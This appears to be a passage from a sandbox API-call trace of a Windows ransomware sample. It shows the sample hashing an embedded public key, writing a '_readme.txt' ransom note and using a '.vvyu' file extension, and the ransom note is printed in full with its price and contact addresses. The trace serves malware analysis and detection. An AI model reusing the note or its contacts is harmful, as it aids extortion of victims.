KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0100.561] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5f0) returned 0x2b32f20 [0100.562] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32498 | out: hHeap=0x670000) returned 1 [0100.562] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b249b0 | out: hHeap=0x670000) returned 1 [0100.606] CryptAcquireContextW (in: phProv=0x18ea44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ea44*=0x6c9a88) returned 1 [0100.607] CryptCreateHash (in: hProv=0x6c9a88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ea48 | out: phHash=0x18ea48) returned 1 [0100.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.608] CryptHashData (hHash=0x2a73b18, pbData=0x2b32f20, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0100.608] CryptGetHashParam (in: hHash=0x2a73b18, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ea4c) returned 1 [0100.608] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x11) returned 0x2aa9398 [0100.608] CryptGetHashParam (in: hHash=0x2a73b18, dwParam=0x2, pbData=0x2aa9398, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x2aa9398, pdwDataLen=0x18ea4c) returned 1 [0100.608] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x34) returned 0x2b22988 [0100.608] GetLastError () returned 0x0 [0100.631] lstrcatA (in: lpString1="", lpString2="B0" | out: lpString1="B0") returned="B0" [0100.631] GetLastError () returned 0x0 [0100.631] lstrcatA (in: lpString1="B0", lpString2="2C" | out: lpString1="B02C") returned="B02C" [0100.631] GetLastError () returned 0x0 [0100.631] lstrcatA (in: lpString1="B02C", lpString2="80" | out: lpString1="B02C80") returned="B02C80" [0100.631] GetLastError () returned 0x0 [0100.631] lstrcatA (in: lpString1="B02C80", lpString2="DC" | out: lpString1="B02C80DC") returned="B02C80DC" [0100.631] GetLastError () returned 0x0 [0100.631] lstrcatA (in: lpString1="B02C80DC", lpString2="8F" | out: lpString1="B02C80DC8F") returned="B02C80DC8F" [0100.631] GetLastError () returned 0x0 [0100.631] lstrcatA (in: lpString1="B02C80DC8F", lpString2="EB" | out: lpString1="B02C80DC8FEB") returned="B02C80DC8FEB" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEB", lpString2="F5" | out: lpString1="B02C80DC8FEBF5") returned="B02C80DC8FEBF5" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF5", lpString2="87" | out: lpString1="B02C80DC8FEBF587") returned="B02C80DC8FEBF587" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587", lpString2="A0" | out: lpString1="B02C80DC8FEBF587A0") returned="B02C80DC8FEBF587A0" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0", lpString2="F6" | out: lpString1="B02C80DC8FEBF587A0F6") returned="B02C80DC8FEBF587A0F6" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F6", lpString2="2E" | out: lpString1="B02C80DC8FEBF587A0F62E") returned="B02C80DC8FEBF587A0F62E" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E", lpString2="01" | out: lpString1="B02C80DC8FEBF587A0F62E01") returned="B02C80DC8FEBF587A0F62E01" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DA") returned="B02C80DC8FEBF587A0F62E01DA" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DA", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA") returned="B02C80DC8FEBF587A0F62E01DADA" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA", lpString2="40" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40") returned="B02C80DC8FEBF587A0F62E01DADA40" [0100.632] GetLastError () returned 0x0 [0100.632] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA40", lpString2="CE" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40CE") returned="B02C80DC8FEBF587A0F62E01DADA40CE" [0100.632] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa9398 | out: hHeap=0x670000) returned 1 [0100.633] CryptDestroyHash (hHash=0x2a73b18) returned 1 [0100.633] CryptReleaseContext (hProv=0x6c9a88, dwFlags=0x0) returned 1 [0100.633] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32f20 | out: hHeap=0x670000) returned 1 [0100.653] lstrlenA (lpString="B02C80DC8FEBF587A0F62E01DADA40CE") returned 32 [0100.653] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3e0) returned 0x2b249b0 [0100.653] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5ec) returned 0x2b32498 [0100.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2b32498, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0100.653] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5f0) returned 0x2b32f20 [0100.653] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32498 | out: hHeap=0x670000) returned 1 [0100.654] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b249b0 | out: hHeap=0x670000) returned 1 [0100.654] lstrcpyA (in: lpString1=0x2a9fe38, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0100.654] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32f20 | out: hHeap=0x670000) returned 1 [0100.654] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1d30 [0100.654] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x2a9f848 [0100.654] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac2120 [0100.654] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac2388 [0100.654] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac25f0 [0100.654] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac2858 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac2ac0 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac2d28 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac2f90 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac31f8 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac3460 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac36c8 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x816) returned 0x2b32498 [0100.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b32498, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b32f20 [0100.655] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32498 | out: hHeap=0x670000) returned 1 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x2a9fb78 [0100.655] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac3930 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac3b98 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac3e00 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac4068 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac42d0 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac4538 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac47a0 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac4a08 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac4c70 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2ac4ed8 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xa0) returned 0x714b60 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x130) returned 0x2af1128 [0100.656] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x714b60 | out: hHeap=0x670000) returned 1 [0100.656] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1d0) returned 0x2aee6d8 [0100.657] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af1128 | out: hHeap=0x670000) returned 1 [0100.657] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2b7) returned 0x2b249b0 [0100.657] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aee6d8 | out: hHeap=0x670000) returned 1 [0100.657] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x412) returned 0x2b1f720 [0100.658] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b249b0 | out: hHeap=0x670000) returned 1 [0100.658] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x61a) returned 0x2b32498 [0100.658] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1f720 | out: hHeap=0x670000) returned 1 [0100.658] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x440) returned 0x2b1f720 [0100.658] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1068) returned 0x2b250d8 [0100.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b1f720, cbMultiByte=-1, lpWideCharStr=0x2b250d8, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned 1077 [0100.658] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1070) returned 0x2b26148 [0100.659] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b250d8 | out: hHeap=0x670000) returned 1 [0100.659] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1f720 | out: hHeap=0x670000) returned 1 [0100.659] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x2a9fc08 [0100.659] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b35440 [0100.659] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b356a8 [0100.659] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b35910 [0100.659] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b35b78 [0100.659] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b35de0 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b36048 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b362b0 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b36518 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b36780 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b369e8 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x80a) returned 0x2b250d8 [0100.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b250d8, cchWideChar=1029 | out: lpWideCharStr=".vvyu") returned 6 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b258f0 [0100.660] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b250d8 | out: hHeap=0x670000) returned 1 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31298 [0100.660] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afdcc0 [0100.660] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa91d8 | out: hHeap=0x670000) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4150 [0100.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x48) returned 0x2ade830 [0100.661] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdcc0 | out: hHeap=0x670000) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1c60 [0100.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1d98 [0100.661] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ade830 | out: hHeap=0x670000) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa86d0 [0100.661] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x90) returned 0x2a97820 [0100.662] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1d98 | out: hHeap=0x670000) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae40f8 [0100.662] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4258 [0100.662] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xd8) returned 0x731f88 [0100.662] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2a97820 | out: hHeap=0x670000) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8688 [0100.685] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b312c0 [0100.685] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae42b0 [0100.685] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x138) returned 0x2aaf940 [0100.685] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x731f88 | out: hHeap=0x670000) returned 1 [0100.685] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1d98 [0100.685] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8718 [0100.685] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4308 [0100.686] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4360 [0100.686] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1c8) returned 0x2aee6d8 [0100.686] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aaf940 | out: hHeap=0x670000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8760 [0100.708] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b213b8 | out: hHeap=0x670000) returned 1 [0100.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31298 | out: hHeap=0x670000) returned 1 [0100.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4150 | out: hHeap=0x670000) returned 1 [0100.709] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1c60 | out: hHeap=0x670000) returned 1 [0100.710] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa86d0 | out: hHeap=0x670000) returned 1 [0100.710] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae40f8 | out: hHeap=0x670000) returned 1 [0100.710] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4258 | out: hHeap=0x670000) returned 1 [0100.710] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa8688 | out: hHeap=0x670000) returned 1 [0100.711] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b312c0 | out: hHeap=0x670000) returned 1 [0100.711] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae42b0 | out: hHeap=0x670000) returned 1 [0100.711] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ad1d98 | out: hHeap=0x670000) returned 1 [0100.712] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa8718 | out: hHeap=0x670000) returned 1 [0100.712] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4308 | out: hHeap=0x670000) returned 1 [0100.712] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4360 | out: hHeap=0x670000) returned 1 [0100.712] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa8760 | out: hHeap=0x670000) returned 1 [0100.713] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aee6d8 | out: hHeap=0x670000) returned 1 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x28) returned 0x2a9fc38 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b36c50 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b36eb8 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b37120 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b37388 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b375f0 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b37858 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b37ac0 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b37d28 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b37f90 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x25c) returned 0x2b381f8 [0100.713] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xa0) returned 0x714b60 [0100.714] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x130) returned 0x2af1128 [0100.714] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x714b60 | out: hHeap=0x670000) returned 1 [0100.714] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1d0) returned 0x2aee6d8 [0100.714] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2af1128 | out: hHeap=0x670000) returned 1 [0100.714] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2b7) returned 0x2b249b0 [0100.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aee6d8 | out: hHeap=0x670000) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x412) returned 0x2b1f720 [0100.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b249b0 | out: hHeap=0x670000) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x61a) returned 0x2b250d8 [0100.715] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1f720 | out: hHeap=0x670000) returned 1 [0100.715] GetUserNameW (in: lpBuffer=0x18ec50, pcbBuffer=0x18eac4 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x18eac4) returned 1 [0100.720] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x590) returned 0x2ad5f90 [0100.720] GetLastError () returned 0x0 [0100.744] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.744] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.744] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x81e) returned 0x2b3a470 [0100.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b3a470, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0100.744] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b3ac98 [0100.745] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3a470 | out: hHeap=0x670000) returned 1 [0100.745] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afe190 [0100.745] HeapFree (in: hHeap=0x670000, 